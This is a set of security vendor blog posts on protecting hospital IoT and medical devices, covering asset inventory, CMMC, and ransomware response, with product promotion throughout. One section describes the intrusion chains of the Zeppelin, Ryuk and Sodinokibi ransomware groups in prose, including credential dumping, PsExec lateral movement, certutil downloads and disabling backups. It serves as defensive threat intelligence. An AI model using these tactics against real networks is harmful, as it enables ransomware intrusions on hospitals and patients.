In 2020 we have seen a massive rise in the number of internet-connected devices with the goal of improving patient care, organizational efficiency, speed of crisis response, and much more during COVID-19. The emergence of telemedicine, digital health records, internet-connected medical devices, patient wellness apps, and an increasing amount of third parties entering the health supply chain undoubtably has created benefits. What it has also created is a vast landscape for threat actors to exploit devices that are unpatched, have default passwords, FDA recalls, CVEs, and so many more vulnerabilities.
This week, we will delve into IT, IoT, OT, and IoMT devices and the appropriate steps to building a true asset inventory, having a baseline of acceptable device behavior in order to spot anomalies or malicious behavior, and the ability to create automated actions based on this information.
Have a True Asset Inventory
Most organizations today struggle to have a real-time, accurate inventory of the devices on their network with the context needed to understand how to manage them.
Detect ALL connected devices — including unmanaged, IoT and IoMT devices on your network. This can include unknown or unknown and unauthorized devices missed in traditional asset inventory.
Have rich context on those devices with make, classification, location, application/port usage, weak ciphers and certificates, manufacturing and FDA recalls, National Defense Authorization Act banned, and devices with regulated data including PCI and PHI.
Continuously analyze every device in real-time to in terms of potential risks to the organization.
Understand Device Behavior – The Good and Bad
Once a true and continuous asset inventory is established you have a clear picture of the devices but how do you sift through the devices to understand which to remediate, take offline, and utilize more.
Identify anomalous and suspicious communications to unauthorized networks and malicious sites and monitor devices for risks such as vulnerabilities, active threats, anomalies, and other malicious activity.
Compare and contrast device utilization across different facilities to identify and improve operational efficiency, schedule upgrades/patches on light usage days/hours to minimize disruption of operation, and ultimately, identify underutilized high-capital equipment to increase the utilization.
Create Automated Actions Based on Rich Device Context
After establishing both a solid asset inventory and then understanding the behavior surrounding your devices, being able to use this information is critical.
Dynamically generate and automatically enforce segmentation policies to isolate high-risk and vulnerable devices and only allow “sanctioned communications”.
Integrate with your existing CMMS, CMDB, firewall, NAC, and SIEM to trigger workflows for enforcement of Zero Trust policies.
The Ordr Systems Control Engine (SCE) can enable visibility and security of all your connected medical devices. It can discover every connected device, profile device behaviors and risks, and automate action for all medical and IoT assets in your healthcare organization.
Recently, we began an IoT Discovery Program that allows organizations to:
Gain high-fidelity visibility into devices that you may not know are on your network
Understand risks including communication patterns and vulnerabilities
Discover usage patterns for your devices
Map these devices to your Layer 2 and Layer 3 architecture
Identify appropriate segmentation policies to secure your devices
Medical devices are difficult to secure on a technical level. They are expensive and their operating systems typically stay the same while in service. These devices are not easily remotely managed, may not be able to be encrypted, and have default user passwords.
IoMT Security Components
To develop a thorough security program you should plan it in three stages:
Manage continuing vulnerability reporting and remediation programs
When trying to secure your medical devices you should be looking at all of the risk areas. Security vulnerabilities pose a threat to patient safety, medical device availability, and could result in financial loss or unauthorized access to information.
How to Analyze Risk
Risk analysis should follow these steps:
System characterization: Gather data on hardware & software
Threat identification: Look at the full spectrum of possible threats
Vulnerability analysis: Ask how do vulnerabilities impact devices and protocols
Controls analysis: Look at controls already in place and what is needed
Likelihood determination: Ask what are the chances of a device being compromised
Impact analysis: Ask how a compromised asset would affect the organization
Risk determination: Ask what risk level a device should be placed in
Controls recommendation: Determine what controls assets need to mitigate vulnerabilities
Results documentation: Share information and communicate with stakeholders
Risk Criteria & Categorization
When determining device risk level it is important to consider the likelihood of threat occurrence as well as the potential impact of threat occurrence on patients, business, and data.
Risk categorization aids in risk prioritization and remediation. You can categorize risks through device threat modeling: collecting device data, establishing a hypothesis, threat hunting, threat detection, and threat response.
It takes a team to create and manage a medical device security program. Setting a purpose and objective for this committee is key. The Responsible Accountable Consulted Informed (RACI) Matrix can help organize stakeholders and ensure everyone is aware of their role and responsibilities.
How Ordr Can Help
Developing a medical device security program can be a difficult and lengthy process. Ordr can help.
The Ordr System Control Engine (SCE) gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. Want to experience Ordr on your network? Request a free sensor.
The biggest medical device security risk organizations face is the possibility of a widespread attack or multiple security threats happening at once. This can cause widespread unavailability of devices needed to treat patients. The integrity of devices is also important to consider, without proper device management and supervision, malware can remain undetected.
Medical devices should be assessed at point of purchase. Before putting a device on a network it should be checked for basic passwords and other vulnerabilities. Organizations should also know all devices that are on the clinical network, and track what those devices are doing. Clinical Engineering (CE) and Information Technology (IT) teams should work together to leverage their training and awareness of device security risks.
Typically there are safety specialists who focus on technical controls and separate specialists who work on risk management, but these tasks should be joined into one security plan so that medical devices are controlled and monitored for risks.
Difficulties Developing a Medical Device Security Program
Developing a medical device security program can be difficult for a multitude of reasons:
Business: Lack of adequate funding, staffing and training issues, as well organizational structure impede the creation of a joint CE and IT security program.
Policy and Procedure: Organizations’ IT policies and procedures rarely include medical device security, and have disjointed governance and sponsorship policies.
Technical: Typical IT network tools do not work for medical device security purposes, and without passively scanning them as part of the IT network, medical devices often get overlooked. Use of legacy devices also causes technical issues, as devices are not updated for long periods of time.
Vendors: Medical device vendors utilize different remote access controls that may or may not be able to show who/what causes devices to crash.
Physical Security: Physical guest access to devices and the potential for organization IDs to be used to gain access to devices puts them at risk.
Addressing the Stakeholders
Involve all parties in the creation of a medical device security plan. Make clinical staff aware of the integrity of medical devices such as ultrasounds and anesthesia machines. Also include CISOs, IT teams, Healthcare Technology Management (HTM) teams and vendors. Discuss with all those involved the objectives of creating a medical device security plan and set up a timeline, as creating and rolling out a security plan can take many months.
How Ordr Can Help
Creating a device security program is challenging on its own, and would be even more difficult without a product to help passively scan for devices and identify risks.
The Ordr System Control Engine (SCE) gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. Want to experience Ordr on your network? Request a free sensor.
Look for a blog post covering Part 3 of the Medical Device Security webinar series in the future. You can watch the full HIMSS webinar here.
Tactics, Techniques, Procedures and Recommendations of How to Triage
Perspective on the increase in ransomware attacks
Ransomware continues to make the headlines as researchers warn of a seven-fold increase compared to 2019. Healthcare is a very lucrative target, with attacks increasing by 350% in Q4 of 2019 (compared to Q4 2018) and continuing to rise through 2020. The pandemic provided a significant opportunity for any threat actor looking to target healthcare providers, as the focus shifted from a holistic look at patient care, health outcomes, experience, revenue, and security to health outcomes. In addition, there has been a mass influx in connected devices deployed in facilities without the proper purview of IT and Security teams, leading to an incomplete asset inventory and clear visibility of how/where devices are communicating.
Ransomware as a viable threat to healthcare organizations has led to sophisticated attackers with complex and targeted campaigns. The recent wave of ransomware campaigns looks more like a hands-on hack than an autonomous piece of malware propagating across the network. The operators facilitating the recent ransomware attacks are heavily incentivized to make sure their malware is extremely effective at propagating diverse networks. We have seen simple pieces of malware like trojan droppers install remote control functionality and backdoors which allow these ransomware operators to then get on to the healthcare network and then run tools like Cobalt Strike to privilege escalate themselves to admin. Once admin privileges have been granted, these ransomware operators begin turning off the malware detection and incident response programs on the infected devices. We’ve seen these operators use tools like Mimikatz to dump memory and gather local admin passwords or common user passwords on systems. Once common passwords have been gathered, the network is theirs for the taking. In organizations that use Remote Desktop Protocol (RDP) on workstations and servers, we’ve seen these compromised local administrator accounts used to install and distribute the ransomware. We’ve also seen these attackers run PsExec and PowerShell scripts remotely by mounting remote shares (like IPC$ and C$) using the compromised credentials. If local or commonly utilized credentials cannot be gathered from initially infected host we’ve seen them pivot to other hosts, or use common exploits kits to propagate throughout the network. These operators are skilled and unfortunately most healthcare providers and healthcare delivery organizations are trivial to compromise once these ransomware operators are inside.
Healthcare organizations that have vulnerable services on the edge of their network get compromised easily by autonomous scripts that are constantly scanning the internet. Once compromised, the script drops a payload that includes all of the tools the operators need for privilege escalation, exploitation, and lateral movement. Many healthcare organizations have flat networks, and utilize common local administrator accounts on largely unpatched systems. It is common to find legacy and largely unsupported operating systems like Windows XP running on both workstations and critical medical devices which cannot be patched and are running vulnerable services like SMBv1 that are available to the entire network. Simply put, once the initial compromise happens, it is largely trivial for these ransomware operators to infect an entire healthcare organization within a few hours.
Let’s discuss the 3 most common ransomware campaigns that are targeting healthcare providers and healthcare delivery organizations and what their TTPs are:
The Zeppelin ransomware is believed to be operated by a Russian cybercrime group however very little is known about the operators. The initial infection code checks to make sure it will not infect machines located in Belorussia, Kazakhstan, Russian Federation, or Ukraine. The Zeppelin ransomware code is largely is based on a purchasable ransomware variant known as VegaLocker which is available on multiple hacking and ransomware as a service websites and forums. The initial infections of Zeppelin began in the beginning of 2019.
What does a Zeppelin Compromise typically look like (TTPs):
Typically, a spam or phishing email is received by an organization that includes an infected document that download and installs malware onto the system.
Some initial infections appear to be Vidar Spyware or the CobaltStrike penetration tester toolkit.
Recently the Zeppelin operators appear to be exploiting vulnerable RDP, Apache Tomcat, and Oracle Weblogic servers available on the internet.
Once connected to the infected system the operators will install PowerShell scripts and PsExec.
In some Zeppelin instances a legitimate remote desktop application called ScreenConnect is initially installed (if it doesn’t already exist). The Zeppelin operators will connect to the ScreenConnect service and install the PowerShell scripts, privilege escalation tools, and PsExec.
The Zeppelin operators will run a set of PowerShell Anti-Anti-Virus scripts and turn off logging to prevent detection and subsequently dump memory looking for local accounts that can be used to either propagate throughout the network or compromise the domain controller.
Typically, the Zepplin operators attempt to compromise the domain controller and once compromised they create a domain admin account to distribute the Zeppelin ransomware throughout the network.
The domain admin account that is typically created is called “SQLSvc”.
If the domain controller is difficult to compromise, they attempt to distribute the Zeppelin ransomware using compromised credentials dumped from memory of infected systems and propagate through file deployment and execution by PsExec.
Once on the Domain Controller, they deploy a command to all connected devices to download Anti-Anti-Virus and Anti-Backup scripts along with the Zeppelin ransomware.
The Zeppelin operators utilize the certutil command on Windows to download and infect machines with the scripts and ransomware.
Finally, the scripts and Zeppelin ransomware is executed on all connected devices via PsExec.
The Ryuk (aka Conti) ransomware is known to be operated by Russian cybercrime group. The Ryuk ransomware was largely based on a previous ransomware codebase known as Hermes which was possibly created by a North Korean hacking group and is purchasable from multiple hacking and ransomware as a service websites and forums. The Russian cybercrime group started targeting healthcare organizations in late 2018.
What does a Ryuk Compromise typically look like (TTPs):
A spam or phishing email is received by an organization that includes an infected document that drops a trojan downloader/bot that includes several tools for remote access, privilege escalation, and lateral movement.
Many believe that the Ryuk operators are working with the Emotet and TrickBot deployers in order to purchase previously infected systems within large networks.
The Ryuk operators gain access to the Emotet/TrickBot compromised machine typically through a PowerShell script that launches a reverse shell that connects to the Ryuk operators.
Once on the infected system the Ryuk operators turn off all PowerShell logging and run Anti-Anti-Virus scripts to prevent detection.
Common lateral movement, privilege escalation, and exploit kits are downloaded onto the infected machine.
It is common for the Ryuk operators to utilize the PowerShell Empire post exploitation kit.
The Ryuk operators dump the infected machines memory looking for local accounts that are used on Workstations and Servers throughout the network.
If local credentials are not found, the operators will use common exploit kits.
Lateral movement and infection happen either via RDP or through PsExec.
Typically, the domain controller is initially targeted and if compromised the domain controllers will typically be used to distribute the scripts and Ryuk ransomware to all connected users/computers.
Anti-Anti-Virus and Anti-Backup/Recovery scripts are run on soon to be infected machines in order to prevent both detection and recovery from the Ryuk ransomware.
The Ryuk ransomware is deployed to all machines using PsExec and a local service is created and started to run the Ryuk binary.
The Ryuk operators sometimes oversee the infection to ensure that it is successful and once infected they start emailing employees informing them of the infection and to reach out to them via an anonymous email where payments are later discussed. The payment amounts typically vary depending on the size and the revenue of the organization that is infected.
Sodinokibi (aka Sodin, REvil) is another ransomware-as-a-service operation which started in April of 2019 and is believed to be created and operated most likely by the same Russian group behind the popular GandCrab ransomware. In early 2019 the Sodinokibi group is believed to have hired affiliate hackers with a guaranteed payment of $50,000 USD and between 60% to 70% cut of the revenue after payments were secured from victims. The developers of this ransomware regularly post updates and new functionality to their code. Once installed, Sodinokibi ransomware initially looks for the computers language settings and will not infect if the set language is used in most former Soviet Union or Middle Eastern countries. The Sodinokibi ransomware has been seen using several TTP’s including manual and automated drive-by compromises using spam/phishing attacks, common exploits, and previously compromised passwords.
What does a Sodinokibi Compromise typically look like (TTPs):
It is difficult to describe the typical attack method used to deploy the Sodinokibi ransomware as there are several which leads some security professionals to believe that Sodinokibi is being operated by multiple cybercrime organizations.
The Sodinokibi operators also appear to be exploiting vulnerable WebLogic and RDP servers available on the internet.
After the initial infection the Sodinokibi operators drop various exploit and privilege escalations kits to laterally move throughout the network.
Similar to Zeppelin the Sodinokibi operators typically use the certutil command on Windows to download their scripts, exploit kits, and ransomware payload to infected machines.
Once infected with the Sodinokibi ransomware, the malicious binary deletes all file shadow copies on the infected system and disables recovery mode in order to ensure that the encrypted files could not be restored from a local backup.
The Sodinokibi ransomware includes several persistence and Anti-Anti-Virus and Anti-Backup/Restore functionality making the installation easy. This functionality makes it more autonomous for the operators which is why we sometimes see Sodinokibi installed in simple drive by attacks on vulnerable internet facing servers and services.
One concerning tactic that most ransomware as a service operators are starting to employ is to exfiltrate several important files from an infected organization and threaten to both publicly disclose the breach and publish the important documents on their blogs typically hosted on the Dark Web. We’ve seen many ransomware operators publicly announce and release sensitive material for companies that did not pay the ransom.
Recommendations on using Ordr to Protect Against Ransomware
Discover and identify your weak points
Identify devices running legacy versions of Windows that are running SMBv1 (such as Windows XP and Windows 7) The Ordr IoT Discovery Program allows you to quickly identify these devices. In Ordr’s Rise of The Machines Report, we identified that 15-19 percent of our deployments had IoT devices running on legacy operating systems Windows 7 (or older).
Identify devices with known vulnerabilities as attackers will try to exploit them them. Use Ordr’s built-in scanner or take advantage of our integration with vulnerability management solutions like Rapid7 and Tenable.
Identify high-risk and vulnerable devices that cannot be patched. Using Ordr integration with winRM, you can identify device operating systems and status of patches.
Enable proactive segmentation
Using Ordr, systems that cannot be patched need to be isolated. Ordr allows you to easily create segmentation policies that restrict devices to only sanctioned communications required for their functions.
Work with Ordr and our firewall and networking infrastructure partners to enforce these segmentation policies in your existing infrastructure.
Monitor for Ransomware Indicators
Identify anomalous communication using the Ordr Flow Genome. This can include discovery of sequential scans on the internal network, and anomalous SMB, RDP, and RPC communications utilized in lateral movement.
Alert on common exploits and known ransomware payload URLs used in lateral movement such as EternalBlue.
Alert on common C2 communications to known ransomware payload servers; when infected machines reach out to these malicious sites, the Ordr product will alert on them.
Track user logon/logoff activities using Ordr. Our platform provides a mechanism to pull user logon and log off activities from Active Directory and also track locally created users. This allows you to ensure the right users have access to vulnerable machines and identify any anomalous user accounts created within the network by threat actors
If you’ve already been attacked by ransomware, here are recommendations on how to deal with it, as described previously in my blog here. Note that with ransomware examples in this blog, there are no decryptors available at this time.
If you have questions about ransomware protection, please contact us at email@example.com. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
Medical devices have important functions and carry sensitive data, making them attractive cyber attack targets. As medical devices become increasingly connected to the internet they are becoming greater security risks. These devices are purchased and utilized by different departments within the organization and can lead to inaccurate asset inventories and unmanaged devices.
Attacks on medical devices can cause disruptions in patient care and possibly result in patient harm. Not only will this result in lower quality care for that patient, it will also affect organizations reputation, and bottom line.
IoT & IoMT Device Security Challenges
There are a variety of security challenges that come with securing medical devices, and each requires a different solution.
Culture: There’s a disconnect between IT and Clinical Engineering teams. Each group has minimal experience and knowledge of the other’s work and capabilities.
Legacy Systems: Many medical devices on networks today are running on outdated operating systems and are kept for long periods of time.
Unable to Update: Medical devices are often difficult, if not impossible, to patch.
Medical Device Ecosystem is Complex: The medical device ecosystem is very complex, with devices coming from multiple vendors and software platforms.
Lack of Security Contracts: Many familiar IT security controls don’t apply to medical devices. Administrative and physical controls can be disruptive to patient care and operations.
Lack of Tools: IT teams have limited tools that work well with medical devices and can scan inventories for vulnerabilities.
Medical Devices are Proprietary: Medical devices are specialized; with different wireless requirements, hardware and software.
Insufficient Visibility: Many medical device networks lack adequate visibility of their medical device inventory.
Medical device security should be comprehensive, creating a security program in three stages ensures it will be implementable down the line.
Risk Assessment: The first step in creating a program is assessing your current security practices. This includes reviewing the current security program practices, installing a passive network scanner, and creating a security risk classification guide. Organizations should also segment devices and decide what teams, whether it be IT or Clinical Engineering, will be remediating vulnerabilities and overseeing different devices.
Program Development: Next, create a cybersecurity program through adding security practices to pre-existing device management practices. This includes continued surveillance over remediated devices and other assets, as well as standardized device assessment, configuration and incident procedures.
Program Management: Sustained device management is necessary for medical organizations to stay secure. Assisting in medical device procurement and deployment, vulnerability reporting, and remediation planning should all be performed as part of program management.
How Ordr Can Help
Cynergistek highlighted a passive device scanner as a key tool to creating and automating a medical device security program. Ordr Systems Control Engine (SCE) is able to provide an accurate asset inventory, properly classify devices with granular detail needed for appropriate workflows, baseline and map device communications and enable micro-segmentation efforts.
The Ordr SCE gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. To learn more about how Ordr can enable an effective IoT security strategy for your organization, request a free sensor.
Look for blog posts covering Part 2 and 3 of the Medical Device Security webinar series in the future. You can watch the full HIMSS webinar here.
Recently Ordr spent time talking to our clients about the Cybersecurity Maturity Model Certification (CMMC): what it is, why it’s important, and how they can prepare for it as it relates to the world of devices and IoT. Ordr is the leader in IoT cybersecurity, ranging from mid-market businesses to large enterprises; many of whom offer services to the Department of Defense (DoD). Because of this, it is incumbent on us to know how the CMMC will apply to our clients infrastructure and to be able to help our clients achieve certification. We realize, and educate our clients that the DoD’s new CMMC isn’t just another framework.
To help our forward-looking clients meet future CMMC requirements, Ordr is already working to map the security controls that IoT and device components require against the CMMC checklist. In order to plan for the CMMC, it is crucial that our clients and potential clients understand how IoT and device configurations are being considered as part of this new maturity model.
First let’s break down what CMMC is. In the Fall of 2020, the US Government will begin requiring organizations to become compliant with CMMC. This is being done primarily to help more organizations fix low rates of compliance associated with NIST 800-171. CMMC will become a requirement designed to permit only businesses with a valid CMMC certification to bid on and win contracts with the US Government. The US Department of Defense (DoD) obviously recognizes that all contractors are not alike, and is using the modifications of the CMMC and its “levels” to make this compliance endeavor more palatable for a broader swath of potential contracting organizations. The CMMC is a tiered model that has the potential to impact every business in the Defense Industrial Base (DIB). To be sure, this is no “small” endeavor.
Soon – contractors in the DoD supply chain will need to be evaluated against this maturity model by a third-party auditor. CMMC contains seventeen capability domains, each of which encompasses a different area of security. Each of these domains will be evaluated on a level from one to five — five being the most mature — and the organization will be assigned an overall CMMC level based on their evaluation results.
CMMC is a big deal for DIB companies because the level that an organization achieves will determine which DoD contracts they’re eligible to bid on and win. Get a 5, the world is your oyster; get a 1 and it limits your available opportunities.
For sure CMMC is daunting. The capability domains outlined in CMMC are very broad, and entail everything from physical security to personnel security to asset management and essentially any other applicable security control that the government can think of. That sounds nearly impossible, and it certainly could be, but in reality CMMC happened to help organizations understand the complexity and breadth of achieving a true security posture. Hopefully CMMC will help mitigate some of the pencil whipping and box checking security failures that have plagued contractors in the past.
Because CMMC is broad, it is critical that any organization wanting to compete and win lucrative contracts heed the call to ensure they consider their IoT/OT security vulnerabilities, as well as their other security controls and programs. Modern exploits and attacks usually cross IT/OT infrastructures at some point. After all, everything is “connected” today. This means that without IoT visibility and accountability the entire network is potentially threatened, and the CMMC auditors know that.
There are very few CMMC domains that don’t apply to IoT network devices. Asset discovery, threat detection, incident response are part of any intelligent or complete response package. One can easily see why they are integral to the CMMC requirements.
While CMMC has many other requirements, much of what it mandates can be summed up pretty simply. Here are a few basic considerations that can help set your organization on the right track to achieving CMMC compliance specifically related to your IoT/OT network devices.
1) Do you have visibility, access, analytics or even the capability to understand IoT devices?
You can’t defend what you don’t cannot see. And you cannot defend any enterprise if you don’t know about the totality of devices or “assets” in a network. Ordr works with organizations to gain that visibility into their IT and IoT networks. In doing this our systems help your team understand how those assets communicate and are connected to each other.
Without that insight and knowledge, it’s impossible to prioritize risks, detect active threats already operating in your environment, or prove that your security posture is strong enough and doing its job. All of those things are key to CMMC compliance across a variety of domains. Being candid, it is impossible to fully secure your networks without having IoT/OT network device visibility.
2) How resilient is your overall IoT/IT network architecture?
CMMC focuses on building a stronger cybersecurity posture in DoD supply chain contractors, and as part of that, CMMC requires an organization to detail how they have built a strong overall approach for securing all network connected devices.
Part of having a sound security posture is to make sure that all devices only communicate with the internet as intended. Stronger network segmentation improves security. Ordr makes network segmentation easy by using ML/AI-assisted automation..
3) Can you identify and remediate IoT/OT device vulnerabilities in your network?
Key CMMC requirements focus on identifying and addressing vulnerabilities across all devices and infrastructure components. For networks with IoT/OT devcies, that could mean CVEs, malfunctioning devices, or the presence of unauthorized ports or rogue applications. CMMC requires that you’re able to detect and prioritize vulnerabilities like this. If your organization cannot do this, you will have a hard time achieving higher levels of compliance. Ordr shines in this area and can rapidly enable this action.
4) Can you detect exploits with all your IoT/OT devices?
IoT and device threats are a very different animal than detecting threats that target legacy IT systems and endpoints. Typically, embedded IoT/ICS devices do not support agents and may not be visible to your IT teams or tools. Because of this gap in security, your organization may be required to incorporate IoT and device aware analytics to detect abnormal machine behavior that could help identify an attack.
This is not an area where current IT approaches can be used in the IoT/OT device environment. The requirements for these unmanaged devices are very different.
Lastly, Ordr can be deployed to help avoid the pain and cost of an extended audit. Like every other federal certification requirement, a 3rd party is going to audit your company for compliance, and that will include your IoT devices, device security controls and asset inventory. Think about this from a financial perspective. With auditors, time is money. If an organization pays an auditor an hourly rate of $300 per hour – the longer it takes the auditor to review and understand your environment, including all the IoT devices, the more billable hours and costs you will accumulate. To minimize the time and costs, it makes sense to have an accurate inventory and full visibility of every asset, including IoT devices, before the auditors arrive. With auditors, nothing exists unless it is documented. Ask Ordr to assist with preparing for your CMMC and FISMA audits.
The COVID-19 pandemic is one of those black swan events that is beyond the scope of normal contingency planning and has unpredictable, long-lasting, and highly disruptive consequences. Yet amid the chaos, one thing has been completely predictable: malicious actors quickly exploiting the panic.
Not long after emergency orders were issued and the healthcare industry was preparing for the first wave of patients infected by coronavirus, malicious actors were already bombarding healthcare workers with phishing emails weaponized with ransomware, and exploiting vulnerable remote desktop systems deployed by hospitals to enable a remote workforce and then installing ransomware on hospital systems.
Ransomware is one of the more insidious attacks that can be unleashed by malicious actors. It usually enters an organization through phishing attacks or vulnerable systems deployed on a network’s perimeter. Once the ransomware gains a foothold, the infection spreads through common exploits or open shares, moving laterally from machine to machine and encrypting important data. Then, once the important data is encrypted, the attackers display a message to pay a ransom or else the data will be lost forever; that is followed by instructions for transferring money to the attackers via untraceable cryptocurrency. In most ransomware cases, the requested ransom amount increases over time in an attempt to lure companies to act fast and pay a lower ransom payment. UCSF was recently targeted by the Netwalker ransomware and paid $1.14M to recover their data.
Hospitals and other healthcare organizations are especially susceptible because many of their mission-critical, internet-connected devices—including medical devices—run vulnerable operating systems that cannot be patched. Some examples include nursing station that have to interact with legacy systems that, in turn, have out of date operating system requirements; or expensive imaging equipment which runs on unsupported and unpatchable versions of WindowsXP. Our Rise of the Machines: 2020 Enterprise Risk and Adoption Report found that 15-19 percent of deployments had IoT devices running on legacy operating systems Windows 7 (or older).
By some estimates there are nearly 650 million IoT and IoMT devices operating in the healthcare industry right now, and 82% of healthcare organizations using IoT/IoMT devices have had those devices attacked.
When a ransomware attack happens:
Don’t Panic: If you can isolate infected machines, do it quickly. Stop the spread of ransomware by isolating those machines from the network and protecting systems with important information. It is much easier to deal with a few infected machines versus thousands, so identifying and stopping the spread of ransomware should be the primary goal after it has entered the network.
Research: Ransomware has been around for a long time. Some variants have been well-studied, and free decryption programs are available to defeat them. Once you know what variant of ransomware has hit your network, you may learn that the keys to decrypt your data are easily available and that your infection turns out to be little more than a nuisance. However, newer variants are more virulent, and use sophisticated algorithms that can’t be decrypted.
Respond: Having assessed your situation and taken the appropriate action to limit the damage, you may still find that your important data is encrypted. This is where the question, “Should I pay the ransom?” comes into play and you have decisions to make. Some points to consider:
How valuable is your lost data and can you do without it?
Do you have that data backed up and archived?
Does losing the data affected by the ransomware put the life of your business at risk?
No Guarantees: One major point to consider if you decide to pay the ransom is that, after doing so there is no guarantee of recovery. Keep in mind that attackers are criminals. They may execute an attack campaign, scoop up quick payouts, and then abandon their victims in order to leave a cold trail for investigators. The systems they’ve set up for transferring payment may not work as intended. Or, they may have never intended to cooperate with anyone who made payment in the first place.
Of course, the best thing you can do to respond to a ransomware attack is to take proactive, mitigating actions. Working with trained security experts to assess vulnerabilities, close security gaps, train employees, and put written incident plan in place specific to your organization, and of course having a robust backup strategy for important information before an attack occurs is your best course of action. There are many antivirus and backup tools out there that can prevent or limit the damage of a ransomware or other malware attack.
For organizations that have adopted IoT as a part of their infrastructure and technology strategy , the Ordr platform is designed to give you full visibility into all the devices connected to your network, understand their purpose and operation, and automate management and security policies to ensure maximal protection for even the most sensitive and mission critical equipment. In a worst-case scenario, Ordr can facilitate the rapid isolation and protection of infected devices.
If you have questions about your situation, or need a partner with the skills and expertise to help protect your IoT assets, let us know. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
The health sector has been undergoing a profound digital transformation in recent years. New digital technologies have allowed for important improvements in all the processes of the sector, from medical follow-ups and preventive care to improved diagnosis and patient services. The sector has also seen major improvements to its connected network, administrative and financial systems. The day-to-day life of hospitals is increasingly punctuated by digital technology and more devices are becoming smart and connected. Consider the MRI scanner, insulin pumps or other important assets that are all digitally interconnected. These devices can communicate information on their operating status, provide detailed information on patients and in some devices can even be operated remotely.
Digital transformation affects all sectors, all organizations, both public and private. Healthcare facilities are no exception, especially in terms of cyber security. This transformation of connectivity in hospitals has unfortunately been accompanied by a sharp increase in threats and risks on all the processes involved. Hackers often favor health care institutions because they know that their security investments are not necessarily prioritized and remain lower than for other industries. With hacks at hospitals, the sector can be impacted as a whole as patient confidence decreases and regulatory fines increase. We focus on vulnerabilities in this article, what it is, and how the medical industry should think about risk and some potential ways to isolate, measure and reduce vulnerabilities.
In hospitals, connected objects are everywhere while confidential patient data is becoming digitized across the board. While the rapid development of digitization and connectivity provides for improved efficiency and quality of care, the industry is now wrestling with the increase in threats and the potential risk of information breaches at these hospitals. Sensitive patient information is what cyber attackers are often after. Just recently in October, the FBI issued a warning that ransomware attacks are becoming “more targeted, sophisticated and costly, even as the overall frequency of attacks remains consistent.”
Framing Vulnerabilities at Hospitals
A vulnerability is essentially a fault or a weakness in an environment that can make the collective system unstable. This amounts to leaving, for example, a house unlocked, a door left open, a checklist incomplete. As a result, this “door” can potentially be used by hackers to access the system.
We often find vulnerabilities on computers but the weakness of vulnerabilities can be increasingly found in many other connected devices. In essence, anything that is “coded” can potentially contain vulnerabilities: including firmware, hypervisors, operating systems, libraries, and software. Vulnerabilities may also appear in the way a network or system has been configured. Once a vulnerability exists, a hacker can exploit this weakness for malicious purposes, causing damage to an organization. Every organization today faces attacks from multiple vectors and overall protection and risk management include thoroughly understanding a system’s vulnerabilities.
At hospitals, medical devices themselves can often be the source of vulnerabilities. A study of 24 hospitals in nine countries (EMEA) found that more than half of the hospitals surveyed used standard passwords (ie default settings) to secure their valuable assets. Data is what is often the target for hackers at hospitals and it’s a constant battle to close opened doors and to risk manage vulnerabilities.
What are hackers after? Patient data can be quite valuable and a medical record can sell for $20 to $300 on the darknet, fetching multiples more than credit card data. Hackers also want to create harm and demand ransom in return. Some hospitals have seen had their patient schedule pirated. Scammers in one instance contacted patients to tell them that their consultation was canceled and showed them a different contact number to reschedule an appointment. It can get worse. In 2016, 114,000 patients by a pharmaceutical company were contacted following the detection of a cyber security breach on an insulin pump model. The control box had a vulnerability that, if it had been exploited, could have allowed the patient to inject a potentially lethal dose of insulin.
Vigilance is Needed
Hospitals have to deal with many security issues and if anything the the number of incidents seem to be on the rise. This is happening while devices being connected to the hospital network is growing at +20% per year.
Theft of scanned records containing medical history, test results, and ongoing treatments.
Misuse of social security and financial data of patients.
Partial or total interruption of access to databases.
Partial or total destruction of the information contained in the databases.
Not Easy for Hospitals
It can be particularly difficult for hospitals to close the door on vulnerabilities. Oftentimes, hospitals are working under regulatory constraints, too many disparate systems and limited overall security and network visibility. Hospitals also have to deal with the lack of resources, training, multiple remote site, and branches. While the headquarters and data centers can be fortified, hackers are all too aware that a remote, unprotected connected site can be an easy on-ramp to the overall healthcare system, exposing yet another key vulnerability.
Cyber Risks and the Consequences Doth Direct and Indirect
Cyber criminals are ingenious and use many methods: phishing, hacking passwords, to get into hospital networks to reach sensitive and profitable data held by hospitals and major healthcare systems. Our next article dives deeper into specific methods of how the bad guys can get in a hospital system. What is alarming is that often times, the bad buys are already in, patiently waiting to exploit vulnerabilities.
Lost Time and Asset Utilization
The goal of hackers is to slow down or paralyze the health facility’s activities until ransom payment and these cyber-extortions can provide considerable financial gains. Think not just of WannaCry but even PetyaWrap which caused Princeton Community Hospital to stop functioning. Doctors were unable to review patients’ medical history or transmit laboratory and pharmacy orders. Unable to restore services and unable to pay a ransom, Princeton Hospital resorted to using paper records. And with little choice left the hospital subsequently scrapped and rebuilt its entire network.
Cyber criminals benefit from the fact that medical equipment such as MRI, X-ray machines, scanners and other diagnostic equipment do not always benefit from optimal security, even though they are almost always connected and used often. This oversight can create security loopholes and encourages intrusions into the systems. Taking a system offline can be a big issue as oftentimes hospitals lease expensive equipment to maximize their usage.
Hidden in the Dark
Highly targeted and sophisticated, the focused on hospitals are often the result of structured groups. These attackers are patient, often lurking undetected waiting to exploit a vulnerability. The goal of the attacker is to discreetly maintain access for as long as possible in order to capture strategic information in a timely manner. In some instances it can be years before an attacker surfaces.
Thinking about Proactive Protection
Businesses need cost-effective, easy-to-deploy solutions that can continually show them who and what is connected to all parts of their networks. The other critical element to consider is the ability to identify any vulnerabilities and apply remedial action proactively. Ideally, the security system will be able to regulate flow and behavior by device type, group, location, function, application, the control is yours.
Many products today will ring the alarm that something is wrong, adding to a whole list of alarms that go off in a day at a hospital. A few will take the next necessary step forward providing automated remediation and loop learning. What we recommend is a system that can quickly provide holistic visibility and the ability to detect exposed vulnerabilities and delivers intricate risk scores for priority attention and mitigation.
